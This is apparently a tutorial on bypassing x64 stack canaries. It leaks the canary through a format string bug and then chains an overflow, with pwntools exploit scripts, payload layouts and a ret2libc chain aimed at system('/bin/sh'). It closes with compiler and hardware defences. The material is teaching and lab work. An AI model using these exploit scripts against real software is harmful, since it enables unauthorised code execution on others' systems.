Stack Canary Bypass via Format String Vulnerability

Using format string bugs to leak stack canaries, then exploiting the buffer overflow with the leaked value - covering canary internals, format-string read primitives, offset discovery, and the full chained exploit.

The Setup

Target binary has: stack canary enabled, NX enabled, no PIE. A format string vulnerability exists before a buffer overflow.

This combination shows up surprisingly often - a server process that takes a “name” from the user, logs it via printf(name) (the bug), and later reads a different field with gets or an oversized read() into a fixed-size stack buffer (the overflow). Each vulnerability on its own is awkward: the format string lets you read or write arbitrary memory but only in small windows, and the overflow is killed instantly by __stack_chk_fail because you cannot guess the canary. Chained, however, the format string supplies exactly what the overflow lacks - the canary value - and the result is a clean code-execution exploit.

Before we walk through the chain, let’s make sure we understand what we’re up against.

What a Stack Canary Actually Is

A canary is a randomised guard value that the compiler inserts on the stack between the local variables and the saved frame pointer / return address. Function prologue:

push rbp
mov  rbp, rsp
sub  rsp, <frame>
mov  rax, qword ptr fs:[0x28]   ; per-thread canary from TLS
mov  qword ptr [rbp - 8], rax

Function epilogue:

mov  rax, qword ptr [rbp - 8]
xor  rax, qword ptr fs:[0x28]
jne  __stack_chk_fail            ; abort if the value changed (real code: je past a call)
leave                            ; restore rsp and the saved rbp
ret

A linear stack overflow that walks toward the saved return address must necessarily pass through the canary. Overwrite the canary with the wrong bytes and __stack_chk_fail slams the door.

The reference canary lives at TLS offset fs:[0x28] on x64 Linux with glibc. It is derived once at process start from the random bytes the kernel passes in AT_RANDOM (with the lowest byte forced to \x00, see below). It does not change for the lifetime of the process, and every thread gets a copy of the same value, which is why a single leak is sufficient.

The Tell-Tale Null Byte

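glibc forces the least significant byte to \x00 so that C string functions stop at the canary. An unterminated-string read (puts, printf("%s")) that runs off the end of a buffer halts at that byte instead of printing the canary, and a strcpy-style overflow cannot write a matching canary and keep going, because the copy ends at the first null byte in the source. This is the first thing to look for when triaging a candidate value:

0xf7a4b1c2d3e4f500   ← canary candidate, low byte = 0x00 ✓
0xa1b2c3d4e5f60718   ← not a canary, low byte is not 0x00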

This is also why an off-by-one null-terminator overflow gains nothing against the canary on its own - the byte it stomps is already 0, so the canary is unchanged and nothing beyond it is touched.
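
To make the byte order concrete, here is a minimal sketch in plain Python (no pwntools needed). The canary value is made up, and c_string_copy is a hypothetical stand-in for strcpy, not a real library call. It shows that the low byte is the first byte in memory on little-endian x64, and that a string copy carrying the canary stops right there.

```python
import struct

def c_string_copy(src: bytes) -> bytes:
    """Model strcpy: copy up to and including the first NUL byte."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end + 1]

canary = 0xF7A4B1C2D3E4F500             # made-up value, low byte 0x00
in_memory = struct.pack("<Q", canary)   # little-endian: low byte is stored first

# A payload that tries to carry the canary through a string copy
payload = b"A" * 16 + in_memory + b"B" * 8
copied = c_string_copy(payload)

print(in_memory.hex())            # the 00 byte comes first in memory
print(len(payload), len(copied))  # the copy stops at the canary's first byte
```

This is why the overflow in this post has to go through a primitive that accepts embedded null bytes.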

Step 1: Leak the Canary

The canary sits between the buffer and the saved return address. Use %p format specifiers to dump stack values:

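from pwn import *

io = process('./vuln')

# Send one positional specifier per round to find the canary offset
for i in range(1, 30):
    io.sendline(f"%{i}$p".encode())   # pwntools expects bytes
    leak = io.recvline().strip()
    print(f"Offset {i}: {leak.decode()}")
# The canary ends in 00 and sits at the same offset on every run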
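
Each line that comes back still has to be turned into a number. A small sketch of that step, assuming the target echoes exactly one %p result per line; parse_pointer_leak is a hypothetical helper name. The one detail worth handling is that glibc prints a NULL pointer as (nil) rather than 0x0.

```python
def parse_pointer_leak(line: bytes) -> int:
    """Turn one line of %p output into an integer."""
    text = line.strip().decode()
    if text == "(nil)":        # glibc's rendering of a NULL pointer
        return 0
    return int(text, 16)       # int() accepts the leading "0x"

value = parse_pointer_leak(b"0x90b41fe2e91d3a00\n")
print(hex(value))
print(parse_pointer_leak(b"(nil)\n"))
```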

How the Read Primitive Works

printf("%n$p") walks its variadic argument area until the n-th 8-byte slot (on x64) and prints whatever is there as a hex pointer. On x64 the first 5 slots come from registers rsi, rdx, rcx, r8, r9 (since rdi already holds the format string itself), and from the 6th slot onward the function reads directly off the stack.

So %6$p is the first stack-resident value, %7$p the next 8 bytes after that, and so on, walking up the stack frame in 8-byte strides until you hit the canary, the saved RBP, the return address, and eventually arguments to whatever called vuln().
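
The index arithmetic can be sketched as follows. The function names are hypothetical, and the offset is measured from RSP in the caller at the moment printf is called, which is an assumption about where you take your reference point in the debugger.

```python
REGISTER_SLOTS = 5   # rsi, rdx, rcx, r8, r9 (rdi holds the format string)
SLOT_SIZE = 8        # each positional argument is one 8-byte slot

def stack_offset(index: int) -> int:
    """Byte offset from the caller's RSP that %<index>$p reads."""
    if index <= REGISTER_SLOTS:
        raise ValueError("indices 1-5 come from registers, not the stack")
    return (index - REGISTER_SLOTS - 1) * SLOT_SIZE

def positional_index(offset: int) -> int:
    """Inverse: which %<n>$p reads the slot at this byte offset."""
    if offset < 0 or offset % SLOT_SIZE:
        raise ValueError("offset must be a non-negative multiple of 8")
    return offset // SLOT_SIZE + REGISTER_SLOTS + 1

print(stack_offset(6), stack_offset(8))
print(positional_index(0x10))
```

If a debugger shows the canary 0x10 bytes above RSP at the printf call, positional_index(0x10) gives the specifier to send.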

Discovering the Canary Offset

Two reliable identifying signals:

Low byte is 0x00, so the printed value ends in 00. %p drops leading zeros, but the canary’s upper bytes are random, so it almost always prints as a full 16 hex digits.
Upper bytes are random rather than address-like: user-space pointers print as 12 hex digits starting 0x7f (stack, libc) or 0x55/0x56 (PIE code, heap), or as short 0x40.... values in a non-PIE binary.

Sample loop output on a debug binary:

Offset  6: 0x4141414141414141     ← our 'AAAAAAAA' input on stack
Offset  7: 0x7ffd1234abc8         ← stack address (rbp/argv neighbour)
Offset  8: 0x90b41fe2e91d3a00     ← canary (low byte 00) ✓
Offset  9: 0x7ffd1234abe0         ← saved rbp
Offset 10: 0x55d4cafe1234         ← saved return address

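Once you have the canary offset (here, 8), it stays valid across runs, because the frame layout is fixed at compile time. The value does not: every new process gets a fresh canary, so the leak and the overflow must happen in the same process (or in a child forked from it). Within that process, %8$p returns the same value every time.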
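
The two signals are easy to automate. A rough sketch, using the values from the sample output above; classify is a hypothetical helper, and the address prefixes it tests are typical for x64 Linux rather than guaranteed.

```python
def classify(value: int) -> str:
    """Rough triage of one leaked 8-byte stack slot."""
    # Canary: low byte zero, and the top two bytes are in use (pointers leave them 0)
    if value & 0xFF == 0 and value >> 48:
        return "canary candidate"
    top = value >> 40
    if top == 0x7F:
        return "stack or libc pointer"
    if top in (0x55, 0x56):
        return "PIE code or heap pointer"
    return "other"

sample = {
    6: 0x4141414141414141,
    7: 0x7FFD1234ABC8,
    8: 0x90B41FE2E91D3A00,
    9: 0x7FFD1234ABE0,
    10: 0x55D4CAFE1234,
}

for offset, value in sample.items():
    print(offset, hex(value), classify(value))

candidates = [off for off, v in sample.items() if classify(v) == "canary candidate"]
print(candidates)
```

A heuristic like this only narrows the list. Confirm the winner under a debugger before building a payload on it.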

Brute-Forcing the Format Specifier

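Sometimes the input path truncates or rejects long format strings. In that case, send each %i$p individually and stitch the output together. pwntools’ FmtStr helper automates a related search: it finds the offset at which your own format string appears on the stack, which anchors the neighbouring slots and is the offset you need for %n writes: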

from pwn import *

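def exec_fmt(payload):
    # Fresh process per probe: fine for offsets, which do not change between runs
    io = process('./vuln')
    io.sendlineafter(b'> ', payload)
    out = io.recvline()
    io.close()
    return out

# pwntools auto-discovers the offset of our own input, not of the canary
auto = FmtStr(exec_fmt)
print(f"Format-string offset: {auto.offset}")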

Step 2: Identify the Canary

glibc stack canaries on x64 Linux always have \x00 as the least significant byte (so that C string operations stop there). Look for a full 8-byte value ending in 00.

If multiple candidates fit (rare but possible - a stale stack value from a previous frame can also end in \x00), use additional disambiguators:

Recurs within one process: the same value is stored in every protected frame up the call chain, so it often shows up at more than one offset in a single dump. Across separate runs the canary changes along with the ASLR’d addresses, so only compare leaks taken from the same process.
pwndbg/gef confirmation: under a debugger, run canary (pwndbg) or compare fs:[0x28] to the leaked value.
Position relative to known anchors: the canary always sits between your buffer and the saved RBP. If you control a long enough input, you can locate the boundary precisely.
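
One further check can be scripted. Every protected frame on the call chain stores the same canary, so in a deep enough dump the real value tends to appear more than once, while a stale look-alike usually does not. A sketch under that assumption; the dump values are invented and recurring_candidates is a hypothetical helper.

```python
from collections import Counter

def recurring_candidates(dump: dict) -> list:
    """Canary-shaped values that occur at more than one offset in a single dump."""
    counts = Counter(
        v for v in dump.values()
        if v & 0xFF == 0 and v >> 48      # low byte 0, all 8 bytes in use
    )
    return [v for v, n in counts.most_common() if n > 1]

# Invented dump: offset -> value, all read from the same process
dump = {
    8: 0x90B41FE2E91D3A00,    # canary in vuln()'s frame
    9: 0x7FFD1234ABE0,
    10: 0x401256,
    13: 0x6F6C6C6568000000,   # stale data that happens to end in 00
    14: 0x90B41FE2E91D3A00,   # same canary again, in the caller's frame
}

print([hex(v) for v in recurring_candidates(dump)])
```

This only helps when the caller is itself compiled with a canary, which depends on the protector level the binary was built with.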

Step 3: Overflow with Leaked Canary

io.sendline(b"%8$p")                # offset 8 is from the sample dump; use the one you found
canary = int(io.recvline().strip(), 16)
payload  = b"A" * BUFFER_SIZE      # Fill buffer
payload += p64(canary)              # Overwrite canary with leaked value
payload += b"B" * 8                 # Saved RBP
payload += p64(win_function)        # Return address
io.sendlineafter(b'payload:\n', payload)

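BUFFER_SIZE is the distance from the start of your overflowed buffer to the canary. The quickest way to get it is from the disassembly: if, for example, the buffer starts at rbp - 0x50 and the canary is stored at rbp - 8, the distance is 0x48. To measure it dynamically, send a cyclic De Bruijn pattern (pwntools cyclic(200, n=8)), break on the canary comparison in the epilogue, read the clobbered canary from the register it was loaded into, and pass that value to cyclic_find(value, n=8). Reading rip after the crash does not work here, because the process aborts in __stack_chk_fail before the corrupted return address is ever used.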
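
A pwntools-free sketch of the same layout, useful for checking that every field lands where you expect before sending anything. The frame offsets, the canary, and the win address are all hypothetical; p64 here is a local stand-in for the pwntools function of the same name.

```python
import struct

def p64(value: int) -> bytes:
    """Little-endian 8-byte packing, like pwntools' p64."""
    return struct.pack("<Q", value)

# Assumed frame, read off a disassembly: buffer at rbp-0x50, canary at rbp-0x8
BUFFER_RBP_OFFSET = 0x50
CANARY_RBP_OFFSET = 0x08
BUFFER_SIZE = BUFFER_RBP_OFFSET - CANARY_RBP_OFFSET

def build_payload(canary: int, return_address: int) -> bytes:
    payload = b"A" * BUFFER_SIZE      # fill up to the canary
    payload += p64(canary)            # restore the canary
    payload += b"B" * 8               # saved rbp (junk)
    payload += p64(return_address)    # new return address
    return payload

payload = build_payload(0x90B41FE2E91D3A00, 0x401196)
print(BUFFER_SIZE, len(payload))
print(payload[BUFFER_SIZE:BUFFER_SIZE + 8].hex())
```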

Stack Alignment Caveat

On x64, the System V ABI requires RSP to be 16-byte aligned immediately before a call, so every function expects RSP = 16 * n + 8 at its first instruction (the +8 is the return address the call pushed). Entering win_function through a ret instead of a call leaves RSP 8 bytes off from that. If win_function (or anything it calls - particularly printf/system/puts) crashes inside an SSE instruction (movaps, movdqa), insert a single extra ret gadget:

ret_gadget = 0x401016        # any plain `ret` in the binary
payload  = b"A" * BUFFER_SIZE
payload += p64(canary)
payload += b"B" * 8
payload += p64(ret_gadget)   # alignment fix-up
payload += p64(win_function)
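
The arithmetic behind the fix-up can be checked in a few lines. This is a sketch with a made-up stack address; the only facts it relies on are that each ret pops 8 bytes and that a function entered by a real call sees RSP = 16n + 8.

```python
def rsp_on_entry(rsp_at_ret: int, extra_ret_gadgets: int = 0) -> int:
    """RSP at the target's first instruction; every ret pops 8 bytes."""
    return rsp_at_ret + 8 * (1 + extra_ret_gadgets)

def matches_call_entry(rsp: int) -> bool:
    """True when RSP looks as it would right after a real call (16n + 8)."""
    return rsp % 16 == 8

# Hypothetical RSP at vuln()'s ret. It is 16n + 8 because vuln() was entered by a call.
RSP_AT_RET = 0x7FFD1234ABE8

direct = rsp_on_entry(RSP_AT_RET)                       # ret straight into win
padded = rsp_on_entry(RSP_AT_RET, extra_ret_gadgets=1)  # ret gadget first

print(hex(direct), matches_call_entry(direct))
print(hex(padded), matches_call_entry(padded))
```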

When `win()` Doesn’t Exist

If the binary doesn’t conveniently provide a win function, the same scaffolding hosts a ROP chain instead - leak libc through puts(puts@got), return back to main, and on the second pass send a chain that calls system("/bin/sh") (see the companion ret2libc post for the libc-leak primitive).
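
As a rough illustration of the first pass, the sketch below lays out a leak chain behind the restored canary. Every address is a placeholder, not taken from any real binary, and BUFFER_SIZE is assumed. In practice you would pull the gadget, PLT, and GOT addresses from the target with your usual tooling.

```python
import struct

def p64(value: int) -> bytes:
    return struct.pack("<Q", value)

# Placeholder addresses for a hypothetical non-PIE target
POP_RDI_RET = 0x401273   # gadget: pop rdi ; ret
PUTS_GOT = 0x404018      # GOT slot holding puts' resolved libc address
PUTS_PLT = 0x401030      # PLT stub for puts
MAIN = 0x401196          # return here for the second pass

BUFFER_SIZE = 72         # assumed distance from buffer start to canary

def leak_chain(canary: int) -> bytes:
    chain = [POP_RDI_RET, PUTS_GOT, PUTS_PLT, MAIN]   # puts(puts@got); main()
    return (
        b"A" * BUFFER_SIZE
        + p64(canary)        # canary restored so the epilogue check passes
        + b"B" * 8           # saved rbp (junk)
        + b"".join(p64(entry) for entry in chain)
    )

stage1 = leak_chain(0x90B41FE2E91D3A00)
print(len(stage1))
```

Because the process does not restart between the two passes, the canary leaked once stays valid for the second payload.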

Why This Works

The epilogue compares the canary stored in the frame against the reference copy at fs:[0x28] and calls __stack_chk_fail only if they differ. If they match, the check passes even though you’ve overwritten the return address. The format string bug gives you the read primitive needed to obtain the canary value.

Restated: SSP (Stack Smashing Protector) is a detection mitigation, not a prevention mitigation. It assumes the attacker has no way to learn the canary value before triggering the overflow - given that single assumption, it works. A format-string read primitive breaks the assumption directly. A heap info leak, an out-of-bounds read on the stack via an unrelated bug, a TLS leak, or a forking server that can be probed one canary byte at a time (children inherit the parent’s canary across fork()) - all of them break the same assumption from different angles.
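
The assumption is easy to see in a toy model. The sketch below simulates one stack frame in a bytearray. It is not how glibc implements anything, the addresses are made up, and StackSmashDetected merely stands in for the abort in __stack_chk_fail.

```python
import os
import struct

class StackSmashDetected(Exception):
    """Stands in for __stack_chk_fail aborting the process."""

def new_canary() -> int:
    # Random 64-bit value with the low byte forced to zero
    return int.from_bytes(os.urandom(8), "little") & ~0xFF

def call_vuln(data: bytes, reference: int, buf_size: int = 16) -> int:
    # Frame layout, low to high: buffer | canary | saved rbp | return address
    frame = bytearray(buf_size + 24)
    struct.pack_into("<Q", frame, buf_size, reference)
    struct.pack_into("<Q", frame, buf_size + 16, 0x401200)  # made-up legitimate return
    n = min(len(data), len(frame))
    frame[:n] = data[:n]                       # unchecked copy: the overflow
    (stored,) = struct.unpack_from("<Q", frame, buf_size)
    if stored != reference:                    # the epilogue check
        raise StackSmashDetected
    (ret,) = struct.unpack_from("<Q", frame, buf_size + 16)
    return ret                                 # where execution would go next

reference = new_canary()
WIN = 0x401196                                 # made-up target address

try:
    call_vuln(b"A" * 40, reference)            # blind overflow
    blind_result = "returned"
except StackSmashDetected:
    blind_result = "aborted"

informed = b"A" * 16 + struct.pack("<Q", reference) + b"B" * 8 + struct.pack("<Q", WIN)
hijacked = call_vuln(informed, reference)      # overflow with the leaked canary

print(blind_result, hex(hijacked))
```

The check cannot tell the two overflows apart by anything other than the eight canary bytes, which is the whole point of the leak.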

Beyond a Single Bug

The same format-string read primitive doubles as:

PIE bypass: read a code pointer from the stack to derive the program base.
libc leak: read a return address that points into libc to derive libc_base.
Frame pointer leak: read the saved RBP to derive the stack base, useful for stack-pivot ROP.
Arbitrary write (with %n): if you can use %n and the format string is large enough, you don’t need the buffer overflow at all - overwrite a GOT entry directly.
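
For the PIE and libc cases the follow-up step is a subtraction plus a sanity check. A sketch, with a hypothetical helper name and invented offsets; the real offset of the leaked pointer within its image comes from the binary or libc you are targeting.

```python
PAGE_SIZE = 0x1000

def base_from_leak(leaked: int, offset_in_image: int) -> int:
    """Derive an image base from a leaked pointer and its known offset."""
    base = leaked - offset_in_image
    if base < 0 or base % PAGE_SIZE:
        # Image bases are page-aligned; anything else means the offset is wrong
        raise ValueError(f"implausible base {base:#x}")
    return base

# Invented example: a leaked return address known to sit 0x1234 bytes into the binary
pie_base = base_from_leak(0x55D4CAFE1234, 0x1234)
print(hex(pie_base))
```

The alignment check is cheap and catches most cases of leaking the wrong slot or using offsets from the wrong libc build.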

A complete exploit on a fully-mitigated binary often looks like: format-string read for canary, format-string read for libc leak, return back to vuln(), second-pass overflow with leaked canary + ROP chain calling system("/bin/sh").

Defender’s Side

To make this exact exploit infeasible:

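Compile with -Wformat -Wformat-security -Werror=format-security - gcc/clang then flag calls such as printf(name) that pass a non-literal format string with no arguments.
-D_FORTIFY_SOURCE=2 (or 3) - printf is routed to __printf_chk, which aborts on %n when the format string is in writable memory and on positional specifiers that skip arguments, so a lone %8$p no longer works. Sequential %p chains still leak, so this raises the bar rather than closing the hole.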
Per-function or re-randomised canaries (research schemes and some hardened toolchains, not stock gcc/glibc) - the canary differs between functions or is refreshed over time, so a leak from one function does not help against an overflow in another.
Shadow stacks (Intel CET on x64, Guarded Control Stack on Arm) - the saved return address is mirrored in a hardware-protected region; even a correct canary value is insufficient to redirect control flow.

Format string bugs are the best friend of stack canary bypass. Whenever you see both a format string and a buffer overflow in the same binary, the exploit path is clear: read first, write second, and the protections fall in order.